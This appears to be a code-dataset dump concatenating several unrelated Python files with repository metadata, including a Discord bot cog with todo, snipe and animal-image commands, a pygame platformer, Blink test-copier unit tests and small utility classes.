items = []
results = sorted((await self.get_all_todo(ctx.author.id)), key=lambda x: x['time'])
for each in results:
time = dt.utcfromtimestamp(each['time'])
since = nt(dt.utcnow() - time)
if each['description']:
desc_em = "❔"
else:
desc_em = ""
items.append(f"[{each['todo']}]({each['message_url']}) (ID: {each['id']} | Created {since}) {desc_em}")
source = paginator.IndexedListSource(data=items, embed=discord.Embed(colour=self.bot.colour),
title="Items (`❔` indicates that the todo has a description)", per_page=5)
menu = paginator.CatchAllMenu(source=source)
menu.add_info_fields({"❔": "Indicates that the todo has a description"})
await menu.start(ctx)
@todo.command()
async def add(self, ctx, *, todo):
"""Adds an item to your todo list"""
if len(todo) > 50:
return await ctx.send("Your todo is too long. Please be more consice.")
id = random.randint(1, 99999)
await self.bot.db.execute(
"INSERT INTO todo (todo, id, time, message_url, user_id) VALUES ($1, $2, $3, $4, $5)", todo, id, time(),
str(ctx.message.jump_url), ctx.author.id)
await ctx.send(f"{ctx.tick()} Inserted `{todo}` into your todo list! (ID: `{id}`)")
@todo.command(aliases=['rm', 'remove'])
async def resolve(self, ctx, *id: int):
"""Resolves an item from your todo list"""
items = await self.get_all_todo(ctx.author.id)
todos = [item[0] for item in items]
ids = [item[1] for item in items]
if any(item not in ids for item in id):
return await ctx.send("You passed in invalid id's!")
message = []
for i in id:
message.append(f"• {todos[ids.index(i)]}")
await self.bot.db.execute("DELETE FROM todo WHERE user_id = $1 AND id = $2", ctx.author.id, i)
await ctx.send(
f"{ctx.tick()} Deleted **{len(id)}** items from your todo list:\n" + "\n".join(message))
@todo.command()
async def list(self, ctx):
"""Shows your todo list"""
command = self.bot.get_command('todo')
await ctx.invoke(command)
@todo.command()
async def clear(self, ctx):
"""Clears all of your todos"""
num = len((await self.bot.db.fetch("SELECT * FROM todo WHERE user_id = $1", ctx.author.id)))
await self.bot.db.execute("DELETE FROM todo WHERE user_id = $1", ctx.author.id)
await ctx.send(f"{ctx.tick()} Deleted **{num}** items from your todo list!")
@todo.command(aliases=['show'])
async def info(self, ctx, id: int):
"""Shows you info on a todo"""
results = await self.bot.db.fetch("SELECT * FROM todo WHERE id = $1", id)
if not results:
raise commands.BadArgument(f'{id} is not a valid todo!')
results = results[0]
embed = discord.Embed(colour=self.bot.colour)
embed.title = f"{results['todo']} » `{results['id']}`"
time = dt.utcfromtimestamp(results['time'])
since = nt(dt.utcnow() - time)
embed.description = f'{results["description"] or ""}\n'
embed.description += f"<:clock:738186842343735387> **{since}**\n"
embed.description += f"**{time.strftime('%A %B %d, %Y at %I:%M %p')}**"
await ctx.send(embed=embed)
@todo.command(aliases=['add_desc', 'ad'])
async def describe(self, ctx, id: int, *, description):
"""Add a description for your todo"""
results = await self.bot.db.fetch("SELECT * FROM todo WHERE id = $1", id)
if not results:
raise commands.BadArgument(f'{id} is not a valid todo!')
if len(description) > 250:
return await ctx.send("That description is too long!")
await self.bot.db.execute("UPDATE todo SET description = $1 WHERE id = $2", description, id)
await ctx.send(
f"{ctx.tick()} Set todo description for `{id}` ({results[0]['todo']}) to `{description}`")
@flags.add_flag("--limit", type=int, default=500)
@flags.add_flag("--channel", type=discord.TextChannel)
@flags.command()
async def snipe(self, ctx, **flags):
"""Shows the most recently deleted messages in a given channel"""
# i know i shouldnt be using json for this
channel = flags.get('channel') or ctx.channel
with open('./json_files/snipes.json', 'r') as f:
snipes = json.load(f)
try:
channel_snipes = snipes[str(channel.id)]
except KeyError:
return await ctx.send(f"{channel} has no deleted messages.")
embeds = []
for snipe in reversed(channel_snipes[:flags.get('limit')]):
try:
author = self.bot.get_user(int(snipe['author'])) or await self.bot.fetch_user(int(snipe['author'])
img = author.avatar_url
except:
author = "Unknown User"
img = "https://media.discordapp.net/attachments/740678305237303454/866900622271971348/avvy.png"
embed = discord.Embed(colour=self.bot.colour)
desc = snipe['content']
if not desc and snipe.get('embed'):
desc = '`<Embedded Message>`'
embed.description = desc
since = dt.strptime(snipe['created_at'], '%Y-%m-%d %H:%M:%S.%f')
embed.set_author(name=f"{author} said in {str(channel)}", icon_url=img)
embed.timestamp = since
embeds.append(embed)
source = paginator.EmbedSource(embeds, footer=False)
await paginator.CatchAllMenu(source).start(ctx)
@commands.command(aliases=['af'])
async def animalfact(self, ctx, animal=None):
"""Shows a fact about an animal of your choice."""
if not animal:
return await ctx.send(
f"**Valid Animal Choices:**\ncat, dog, koala, fox, bird, elephant, panda, racoon, kangaroo, giraffe, whale")
try:
animal = str(animal).lower().replace(' ', '_')
em = ANIMALS.get(animal)
fact = await self.sr.get_fact(animal)
await ctx.send(f"{em} **Random {animal.replace('_', ' ').title()} Fact:**\n{fact}")
except Exception as error:
return await ctx.send(error)
async def get_attachement(self, image_url: str, ext='png') -> discord.File:
"""Gives you a valid image attachment of any url"""
async with self.bot.session.get(image_url) as r:
data = await r.read()
image = BytesIO(data)
return discord.File(image, filename=f'image.{ext}')
@commands.command()
async def inspiration(self, ctx):
"""Get inspired"""
async with self.bot.session.get('https://inspirobot.me/api?generate=true') as r:
data = await r.text()
file = await self.get_attachement(data)
await ctx.send(content=f"**Inspiration**", file=file)
@commands.command(aliases=['aimg'])
async def animalimg(self, ctx, *, animal=None):
"""Shows an image of an animal of your choice."""
if not animal:
return await ctx.send(
f"**Valid Animal Choices:**\ncat, dog, koala, fox, birb, red panda, panda, racoon, kangaroo")
try:
async with ctx.typing():
animal = str(animal).lower().replace(' ', '_')
image = await self.sr.get_image(animal)
file = await self.get_attachement(image.url)
await ctx.send(f"{ANIMALS.get(animal, '')} **Random {animal.replace('_', ' ').title()} Image:**",
file=file)
except Exception as error:
return await ctx.send(error)
@commands.command()
async def hug(self, ctx, member: discord.Member):
async with ctx.typing():
image = await self.sr.get_gif('hug')
file = await self.get_attachement(image.url, 'gif')
await ctx.send(f"{EMOTIONS['hug']} **{ctx.author.display_name}** hugged **{member.display_name}**!", file=file)
@commands.command()
async def pat(self, ctx, member: discord.Member):
async with ctx.typing():
image = await self.sr.get_gif('pat')
file = await self.get_attachement(image.url, 'gif')
await ctx.send(f"{EMOTIONS['pat']} **{ctx.author.display_name}** patted **{member.display_name}**!", file=file)
@commands.command()
async def facepalm(self, ctx):
async with ctx.typing():
image = await self.sr.get_gif('face-palm')
file = await self.get_attachement(image.url, 'gif')
await ctx.send(f"{EMOTIONS['face-palm']} **{ctx.author.display_name}** facepalmed!", file=file)
@commands.command()
async def wink(self, ctx):
async with ctx.typing():
image = await self.sr.get_gif('wink')
file = await self.get_attachement(image.url, 'gif')
await ctx.send(f"{EMOTIONS['wink']} **{ctx.author.display_name}** winked!", file=file)
@commands.command()
async def dog(self, ctx):
"""Shows you an image of a dog."""
async with self.bot.session.get('https://dog.ceo/api/breeds/image/random') as r, ctx.typing():
data = await r.json()
file = await self.get_attachement(data['message'])
await ctx.send(f"{ANIMALS.get('dog')} **Random Dog Image**", file=file)
def format_meanings(self, ret: dict) -> str:
message = ''
for index, value in ret.items():
message += f"\n**{index}**\n"
for num, _def in enumerate(value, 1):
message += f"[{num}] {_def}\n"
return message
@commands.group(aliases=['dictionary'], invoke_without_command=True)
async def word(self, ctx, *, word):
"""Fetch a word's definition"""
# thanks to deviljamjar for this idea
# find the original here: https://github.com/DevilJamJar/DevilBot/blob/master/cogs/utility.py/#L48-#L65
async with ctx.typing():
try:
ret = await self.bot.loop.run_in_executor(None, self._dictionary.meaning, word)
except Exception as error:
raise error
embed = discord.Embed(colour=self.bot.colour, title=word.lower())
if not ret:
raise commands.BadArgument("this word was not found in the dictionary!")
embed.description = self.format_meanings(ret)
await ctx.send(embed=embed)
@word.command(aliases=['syn'])
async def synonyms(self, ctx, *, word):
"""Shows you the synonyms of a word."""
async with ctx.typing():
try:
ret = await self.bot.loop.run_in_executor(None, self._dictionary.synonym, word)
except Exception as error:
raise error
embed = discord.Embed(colour=self.bot.colour, title=word.lower())
embed.description = ', '.join(ret)
await ctx.send(embed=embed)
@word.command(aliases=['ant'])
async def antonyms(self, ctx, *, word):
"""Shows you the antonyms of a word."""
async with ctx.typing():
try:
ret = await self.bot.loop.run_in_executor(None, self._dictionary.antonym, word)
except Exception as error:
raise error
embed = discord.Embed(colour=self.bot.colour, title=word.lower())
embed.description = ', '.join(ret)
await ctx.send(embed=embed)
@word.command()
async def many(self, ctx, *words):
"""Get information on many words"""
command = self.bot.get_command('words')
await ctx.invoke(command, *words)
@commands.command()
async def words(self, ctx, *words):
"""Get information on many words"""
async with ctx.typing():
_dict = dictionary(*words)
try:
ret = await self.bot.loop.run_in_executor(None, _dict.getMeanings)
except Exception as error:
raise error
embed = discord.Embed(colour=self.bot.colour)
embed.title = "Words"
not_found = list()
for word in words:
meanings = ret.get(word)
if not meanings:
not_found.append(word)
continue
embed.add_field(name=word.lower(), value=self.format_meanings(meanings))
if not_found:
embed.set_footer(text=', '.join(not_found) + " were not found.")
try:
await ctx.send(embed=embed)
except discord.HTTPException:
return await ctx.send("You passed in too many words!")
@commands.command()
async def ship(self, ctx, member_1: discord.Member, member_2: discord.Member):
"""Ship 2 members"""
from random import randint
rate = randint(1, 100)
await ctx.send(f"""**{member_1}** | <a:hug:748315930685210746> {rate}% :heart: | **{member_2}**""")
def setup(bot):
bot.add_cog(Fun(bot))
| 6,035 | 0 | 575 |
aba5777a4c926a5861081c3fc23ee89efd72f0ec | 369 | py | Python | LinkStation01/linkstation.py | userSoni/LinkStation_Nord | 302ecbe5f817e8130863d9a78a7061da6a91ab8a | [
"MIT"
] | null | null | null | LinkStation01/linkstation.py | userSoni/LinkStation_Nord | 302ecbe5f817e8130863d9a78a7061da6a91ab8a | [
"MIT"
] | null | null | null | LinkStation01/linkstation.py | userSoni/LinkStation_Nord | 302ecbe5f817e8130863d9a78a7061da6a91ab8a | [
"MIT"
] | null | null | null | from point import Point | 21.705882 | 45 | 0.520325 | from point import Point
class LinkStation(Point):
def __init__(self, x, y, reach):
super().__init__(x, y)
self.reach = reach
def get_power(self, other):
distance = super().__add__(other)
if distance > self.reach:
return(self.reach - distance)**2
else:
return 0 | 259 | 4 | 83 |
7fec8510d8834d53c7b7fbb66f1d96b267c28dfc | 1,764 | py | Python | PLM/cores/base/BaseProfile.py | vtta2008/pipelineTool | 2431d2fc987e3b31f2a6a63427fee456fa0765a0 | [
"Apache-2.0"
] | 7 | 2017-12-22T02:49:58.000Z | 2018-05-09T05:29:06.000Z | PLM/cores/base/BaseProfile.py | vtta2008/pipelineTool | 2431d2fc987e3b31f2a6a63427fee456fa0765a0 | [
"Apache-2.0"
] | null | null | null | PLM/cores/base/BaseProfile.py | vtta2008/pipelineTool | 2431d2fc987e3b31f2a6a63427fee456fa0765a0 | [
"Apache-2.0"
] | 3 | 2019-03-11T21:54:52.000Z | 2019-11-25T11:23:17.000Z | # -*- coding: utf-8 -*-
"""
Script Name:
Author: Do Trinh/Jimmy - 3D artist.
Description:
"""
# -------------------------------------------------------------------------------------------------------------
""" Import """
from pyPLM.damg import DAMGDICT
# -------------------------------------------------------------------------------------------------------------
# Created by Trinh Do on 5/6/2020 - 3:13 AM
# © 2017 - 2020 DAMGteam. All rights reserved
| 20.045455 | 111 | 0.452381 | # -*- coding: utf-8 -*-
"""
Script Name:
Author: Do Trinh/Jimmy - 3D artist.
Description:
"""
# -------------------------------------------------------------------------------------------------------------
""" Import """
from pyPLM.damg import DAMGDICT
class BaseProfile(DAMGDICT):
key = 'BaseProfile'
_ip = None
_city = None
_country = None
_latitude = None
_longtitude = None
def __init__(self, parent=None):
super(BaseProfile, self).__init__()
self._parent = parent
@property
def parent(self):
return self._parent
@property
def ip(self):
return self._ip
@property
def city(self):
return self._city
@property
def country(self):
return self._country
@property
def latitude(self):
return self._latitude
@property
def longtitue(self):
return self._longtitude
@parent.setter
def parent(self, val):
self._parent = val
@ip.setter
def ip(self, val):
self._ip = val
@city.setter
def city(self, val):
self._city = val
@country.setter
def country(self, val):
self._country = val
@latitude.setter
def latitude(self, val):
self._latitude = val
@longtitue.setter
def longtitue(self, val):
self._longtitude = val
# -------------------------------------------------------------------------------------------------------------
# Created by Trinh Do on 5/6/2020 - 3:13 AM
# © 2017 - 2020 DAMGteam. All rights reserved
| 472 | 803 | 23 |
7ac6e00808fd150fa05e6e5250a60150d5b436c5 | 538 | py | Python | test/unit/test_dealer.py | fedden/pluribus | 73fb394b26623c897459ffa3e66d7a5cb47e9962 | [
"MIT"
] | 2 | 2020-01-12T07:59:56.000Z | 2020-01-13T10:04:26.000Z | test/unit/test_dealer.py | fedden/pluribus | 73fb394b26623c897459ffa3e66d7a5cb47e9962 | [
"MIT"
] | null | null | null | test/unit/test_dealer.py | fedden/pluribus | 73fb394b26623c897459ffa3e66d7a5cb47e9962 | [
"MIT"
] | null | null | null | from poker_ai.poker.dealer import Dealer
from poker_ai.poker.card import Card
| 33.625 | 54 | 0.67658 | from poker_ai.poker.dealer import Dealer
from poker_ai.poker.card import Card
def test_dealer_1():
include_ranks = [10, 11, 12, 13, 14]
dealer = Dealer(include_ranks=include_ranks)
deck_size = len(dealer.deck._cards_in_deck)
assert deck_size == len(include_ranks * 4)
for i in range(1, deck_size + 1):
card: Card = dealer.deal_card()
del card
deck_size = len(dealer.deck._cards_in_deck)
assert deck_size == len(include_ranks * 4) - i
assert len(dealer.deck._dealt_cards) == i
| 436 | 0 | 23 |
63f49a94d2256bfdae63b7d1a67ab338901cf892 | 7,117 | py | Python | minigame1/Minigame1.py | Tdallau/HRO_project2_minigames | 7fdecaa942d1a05d2cd451fd7f5d47e51c571c42 | [
"MIT"
] | null | null | null | minigame1/Minigame1.py | Tdallau/HRO_project2_minigames | 7fdecaa942d1a05d2cd451fd7f5d47e51c571c42 | [
"MIT"
] | null | null | null | minigame1/Minigame1.py | Tdallau/HRO_project2_minigames | 7fdecaa942d1a05d2cd451fd7f5d47e51c571c42 | [
"MIT"
] | null | null | null | import pygame
import sys
import os
import csv
import random
from pygame import *
from minigame1.Player import *
from minigame1.Mobs import *
from minigame1.Camera import *
from minigame1.KeyBlock import *
from minigame1.PilarBlock import *
from minigame1.Text import *
from minigame1.HighScore import *
from pprint import pprint
| 31.772321 | 147 | 0.529156 | import pygame
import sys
import os
import csv
import random
from pygame import *
from minigame1.Player import *
from minigame1.Mobs import *
from minigame1.Camera import *
from minigame1.KeyBlock import *
from minigame1.PilarBlock import *
from minigame1.Text import *
from minigame1.HighScore import *
from pprint import pprint
def Tim_2dPlatform():
WIN_WIDTH = 800
WIN_HEIGHT = 640
HALF_WIDTH = int(WIN_WIDTH / 2)
HALF_HEIGHT = int(WIN_HEIGHT / 2)
DISPLAY = (WIN_WIDTH, WIN_HEIGHT)
DEPTH = 32
FLAGS = 0
CAMERA_SLACK = 30
global cameraX, cameraY
pygame.init()
screen = pygame.display.set_mode(DISPLAY, FLAGS, DEPTH)
pygame.display.set_caption("2D platform")
timer = pygame.time.Clock()
start_tick = pygame.time.get_ticks()
font_preferences = [
"Bizarre-Ass Font Sans Serif",
"They definitely dont have this installed Gothic",
"Papyrus",
"Comic Sans MS"]
up = down = left = right = running = False
bg = pygame.image.load(os.path.join("images","strand.jpg")).convert()
screen.blit(bg,(0,0))
scoreboard = Surface((180,70))
scoreboard.fill((255,255,255))
screen.blit(scoreboard,(scoreboard.get_width(),0))
print(scoreboard.get_width())
entities = pygame.sprite.Group()
mobs = pygame.sprite.Group()
player = Player(screen,font_preferences, entities, 32, 640)
mob = Mobs(265,WIN_HEIGHT + 64,1)
platforms = []
x = y = 0
drawLevel(x,y,platforms,entities)
total_level_width = 44*32
total_level_height = 25*32
camera = Camera(complex_camera, total_level_width, total_level_height)
entities.add(player)
entities.add(mob)
mobs.add(mob)
heighscore = HighScore(0)
active = True
#end of game message
t = Text("Je hebt deze mini-game uitgespeeld. klik op r om de mini-game te reseten of op c om af te sluiten.", font_preferences, 25, (0, 0, 0))
text = t.create_text()
#scoreboard tile
st = Text("Highscore: | Score: ", font_preferences, 20, (0,0,0))
st_text = st.create_text()
while active:
timer.tick(30)
# pygame.mixer.music.load("strand.mp3")
# pygame.mixer.music.play()
# if not player.finished:
for e in pygame.event.get():
if e.type == pygame.QUIT:
pygame.quit()
sys.exit()
if e.type == pygame.KEYDOWN and e.key == pygame.K_ESCAPE:
pygame.quit()
sys.exit()
if player.finished:
if e.type == pygame.KEYDOWN and e.key == pygame.K_c:
heighscore.checkForHighScore(seconde)
return heighscore
if e.type == pygame.KEYDOWN and e.key == pygame.K_r:
heighscore.checkForHighScore(seconde)
player.inventory.clearInventory()
player.rect.x = 32
player.rect.y = 640
player.xvel = 0
player.yvel = 0
player.finished = False
start_tick = pygame.time.get_ticks()
# k = KeyBlock(player.backupKey_x,player.backupKey_y)
# entities.add(k)
# platforms.append(k)
entities = pygame.sprite.Group()
entities.add(player)
entities.add(mob)
player.entities = entities
platforms = []
x = y = 0
drawLevel(x,y,platforms,entities)
# mob = Mobs(265,WIN_HEIGHT + 64,1)
mob.rect.x = 265
mob.rect.y = WIN_HEIGHT + 64
# mobs.add(mob)
if not player.finished:
if e.type == pygame.KEYDOWN and e.key == pygame.K_UP:
up = True
if e.type == pygame.KEYDOWN and e.key == pygame.K_DOWN:
down = True
if e.type == pygame.KEYDOWN and e.key == pygame.K_LEFT:
left = True
if e.type == pygame.KEYDOWN and e.key == pygame.K_RIGHT:
right = True
if e.type == pygame.KEYDOWN and e.key == pygame.K_SPACE:
running = True
if e.type == pygame.KEYUP and e.key == pygame.K_UP:
up = False
if e.type == pygame.KEYUP and e.key == pygame.K_DOWN:
down = False
if e.type == pygame.KEYUP and e.key == pygame.K_RIGHT:
right = False
if e.type == pygame.KEYUP and e.key == pygame.K_LEFT:
left = False
# draw background
screen.blit(bg,(0,0))
scoreboard.fill((255,255,255))
scoreboard.blit(st_text,(0,0))
#highscore amound
hsa = Text(str(heighscore.amound), font_preferences, 20, (0,0,0))
hsa_text = hsa.create_text()
scoreboard.blit(hsa_text,(20,st_text.get_height() + 10))
if not player.finished:
seconde = (pygame.time.get_ticks() - start_tick )//1000
tm = Text(str(seconde), font_preferences, 20, (0, 0, 0))
tm_text = tm.create_text()
scoreboard.blit(tm_text,
(scoreboard.get_width() - (scoreboard.get_width() / 2) + 40 , st_text.get_height() + 10))
#draw scoreboard
# scoreboard.fill((255,255,255))
screen.blit(scoreboard,(scoreboard.get_width() - 100,0))
camera.update(player)
# update player, draw everything else
player.update(up, down, left, right, running, platforms, mobs)
mob.update(mobs,platforms,entities)
for e in entities:
screen.blit(e.image, camera.apply(e))
if player.finished:
screen.blit(text,
(320 - text.get_width() // 2, 400 - text.get_height() // 2))
entities = player.entities
mobs = mob.mobs
pygame.display.update()
def drawLevel (x,y,platforms,entities):
levels = ["level1", "level2", "level3"]
readCSV = ''
row = ''
col = ''
# print(levels[random.randint(0,1)])
# build the level
with open(levels[random.randint(0,2)] + ".csv") as csvfile:
readCSV = csv.reader(csvfile, delimiter=';')
for row in readCSV:
for col in row:
if col == "P":
p = Platform(x, y)
platforms.append(p)
entities.add(p)
if col == "E":
e = ExitBlock(x, y)
platforms.append(e)
entities.add(e)
if col == "K":
k = KeyBlock(x, y)
platforms.append(k)
entities.add(k)
if col == "B":
b = PilarBlock(x, y)
platforms.append(b)
entities.add(b)
x += 32
y += 32
x = 0
print(readCSV)
| 6,732 | 0 | 46 |
60f526518d09f8565abde81e7e957b5c348fcd01 | 5,014 | py | Python | third_party/blink/tools/blinkpy/w3c/test_copier_unittest.py | sarang-apps/darshan_browser | 173649bb8a7c656dc60784d19e7bb73e07c20daa | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null | third_party/blink/tools/blinkpy/w3c/test_copier_unittest.py | sarang-apps/darshan_browser | 173649bb8a7c656dc60784d19e7bb73e07c20daa | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null | third_party/blink/tools/blinkpy/w3c/test_copier_unittest.py | sarang-apps/darshan_browser | 173649bb8a7c656dc60784d19e7bb73e07c20daa | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null | # Copyright (C) 2013 Adobe Systems Incorporated. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials
# provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDER "AS IS" AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF
# THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
from blinkpy.common.host_mock import MockHost
from blinkpy.common.path_finder import RELATIVE_WEB_TESTS
from blinkpy.common.system.executive_mock import MockExecutive, ScriptError
from blinkpy.common.system.filesystem_mock import MockFileSystem
from blinkpy.common.system.log_testing import LoggingTestCase
from blinkpy.w3c.test_copier import TestCopier
MOCK_WEB_TESTS = '/mock-checkout/' + RELATIVE_WEB_TESTS
FAKE_SOURCE_REPO_DIR = '/blink'
FAKE_FILES = {
MOCK_WEB_TESTS + 'external/OWNERS': '',
'/blink/w3c/dir/has_shebang.txt': '#!',
'/blink/w3c/dir/README.txt': '',
'/blink/w3c/dir/OWNERS': '',
'/blink/w3c/dir/reftest.list': '',
MOCK_WEB_TESTS + 'external/README.txt': '',
MOCK_WEB_TESTS + 'W3CImportExpectations': '',
}
| 39.793651 | 90 | 0.631432 | # Copyright (C) 2013 Adobe Systems Incorporated. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials
# provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDER "AS IS" AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF
# THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
from blinkpy.common.host_mock import MockHost
from blinkpy.common.path_finder import RELATIVE_WEB_TESTS
from blinkpy.common.system.executive_mock import MockExecutive, ScriptError
from blinkpy.common.system.filesystem_mock import MockFileSystem
from blinkpy.common.system.log_testing import LoggingTestCase
from blinkpy.w3c.test_copier import TestCopier
MOCK_WEB_TESTS = '/mock-checkout/' + RELATIVE_WEB_TESTS
FAKE_SOURCE_REPO_DIR = '/blink'
FAKE_FILES = {
MOCK_WEB_TESTS + 'external/OWNERS': '',
'/blink/w3c/dir/has_shebang.txt': '#!',
'/blink/w3c/dir/README.txt': '',
'/blink/w3c/dir/OWNERS': '',
'/blink/w3c/dir/reftest.list': '',
MOCK_WEB_TESTS + 'external/README.txt': '',
MOCK_WEB_TESTS + 'W3CImportExpectations': '',
}
class TestCopierTest(LoggingTestCase):
def test_import_dir_with_no_tests(self):
host = MockHost()
host.executive = MockExecutive(exception=ScriptError('error'))
host.filesystem = MockFileSystem(files=FAKE_FILES)
copier = TestCopier(host, FAKE_SOURCE_REPO_DIR)
copier.do_import() # No exception raised.
def test_does_not_import_owner_files(self):
host = MockHost()
host.filesystem = MockFileSystem(files=FAKE_FILES)
copier = TestCopier(host, FAKE_SOURCE_REPO_DIR)
copier.find_importable_tests()
self.assertEqual(copier.import_list, [{
'copy_list': [{
'dest': 'has_shebang.txt',
'src': '/blink/w3c/dir/has_shebang.txt'
}, {
'dest': 'README.txt',
'src': '/blink/w3c/dir/README.txt'
}],
'dirname':
'/blink/w3c/dir',
}])
def test_does_not_import_reftestlist_file(self):
host = MockHost()
host.filesystem = MockFileSystem(files=FAKE_FILES)
copier = TestCopier(host, FAKE_SOURCE_REPO_DIR)
copier.find_importable_tests()
self.assertEqual(copier.import_list, [{
'copy_list': [{
'dest': 'has_shebang.txt',
'src': '/blink/w3c/dir/has_shebang.txt'
}, {
'dest': 'README.txt',
'src': '/blink/w3c/dir/README.txt'
}],
'dirname':
'/blink/w3c/dir',
}])
def test_files_with_shebang_are_made_executable(self):
host = MockHost()
host.filesystem = MockFileSystem(files=FAKE_FILES)
copier = TestCopier(host, FAKE_SOURCE_REPO_DIR)
copier.do_import()
self.assertEqual(
host.filesystem.executable_files,
set([MOCK_WEB_TESTS + 'external/blink/w3c/dir/has_shebang.txt']))
def test_ref_test_with_ref_is_copied(self):
host = MockHost()
host.filesystem = MockFileSystem(
files={
'/blink/w3c/dir1/my-ref-test.html':
'<html><head><link rel="match" href="ref-file.html" />test</head></html>',
'/blink/w3c/dir1/ref-file.html':
'<html><head>test</head></html>',
MOCK_WEB_TESTS + 'W3CImportExpectations':
'',
})
copier = TestCopier(host, FAKE_SOURCE_REPO_DIR)
copier.find_importable_tests()
self.assertEqual(copier.import_list, [{
'copy_list': [{
'src': '/blink/w3c/dir1/ref-file.html',
'dest': 'ref-file.html'
},
{
'src': '/blink/w3c/dir1/my-ref-test.html',
'dest': 'my-ref-test.html'
}],
'dirname':
'/blink/w3c/dir1',
}])
| 2,747 | 17 | 157 |
d5386382d1006c88589c40562d15a92314c4d07c | 1,106 | py | Python | backend/paperchase/manage/users.py | dedalusj/PaperChase | 728cd2f742275b12223d91613275358fb4a92feb | [
"MIT"
] | 3 | 2015-02-13T02:42:39.000Z | 2016-11-22T08:03:45.000Z | backend/paperchase/manage/users.py | dedalusj/PaperChase | 728cd2f742275b12223d91613275358fb4a92feb | [
"MIT"
] | null | null | null | backend/paperchase/manage/users.py | dedalusj/PaperChase | 728cd2f742275b12223d91613275358fb4a92feb | [
"MIT"
] | 1 | 2020-10-10T08:35:16.000Z | 2020-10-10T08:35:16.000Z | # -*- coding: utf-8 -*-
"""
paperchase.manage.journals
~~~~~~~~~~~~~~~~~~~~~
jorunals management commands
"""
import datetime
from flask.ext.script import Command, prompt, prompt_pass
from werkzeug.datastructures import MultiDict
from ..services import users | 29.891892 | 166 | 0.631103 | # -*- coding: utf-8 -*-
"""
paperchase.manage.journals
~~~~~~~~~~~~~~~~~~~~~
jorunals management commands
"""
import datetime
from flask.ext.script import Command, prompt, prompt_pass
from werkzeug.datastructures import MultiDict
from ..services import users
class CreateUser(Command):
def run(self):
email = prompt('email')
password = prompt_pass('password')
confirm_password = prompt_pass('confirm password')
if password != confirm_password:
print '\nMismatching passwords'
return
user = users.create( email = email, password = password, registered_at = datetime.datetime.utcnow(), active = True, confirmed_at = datetime.datetime.utcnow())
print '\nUser created successfully'
print 'User(id=%s email=%s)' % (user.id, user.title)
class DeleteUser(Command):
def run(self):
email = prompt('User email')
user = users.first(email = email)
if not user:
print 'Invalid user email'
return
users.delete(user)
print 'User deleted successfully' | 723 | 10 | 100 |
096913bfd7f5ce438837ebc5ce70ac71e4b5cab7 | 817 | py | Python | simpleotp/__init__.py | soumilrao/simple-otp | b1b5865850902f2b3e7b46e2205525daacb69fb4 | [
"MIT"
] | null | null | null | simpleotp/__init__.py | soumilrao/simple-otp | b1b5865850902f2b3e7b46e2205525daacb69fb4 | [
"MIT"
] | null | null | null | simpleotp/__init__.py | soumilrao/simple-otp | b1b5865850902f2b3e7b46e2205525daacb69fb4 | [
"MIT"
] | 2 | 2020-07-03T03:47:11.000Z | 2022-02-22T07:39:09.000Z | """Top-level package for simple-otp."""
__author__ = """Kshitij Nagvekar"""
__email__ = 'kshitij.nagvekar@workindia.in'
__version__ = '0.1.0'
try:
from secrets import SystemRandom
except ImportError:
from random import SystemRandom
from typing import Sequence
from .otp import OTP
random = SystemRandom()
def generate_secret(
length: int = 16,
chars: Sequence[str] = None
) -> str:
"""
Generates a secret which can be used as secret key
:param length: key length
:param chars: list of characters to be used to generate secret key
:return: secret key string
"""
if chars is None:
chars = list('ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890')
return ''.join(
random.choice(chars)
for _ in range(length)
)
__all__ = ["generate_secret", "OTP"]
| 20.948718 | 70 | 0.673195 | """Top-level package for simple-otp."""
__author__ = """Kshitij Nagvekar"""
__email__ = 'kshitij.nagvekar@workindia.in'
__version__ = '0.1.0'
try:
from secrets import SystemRandom
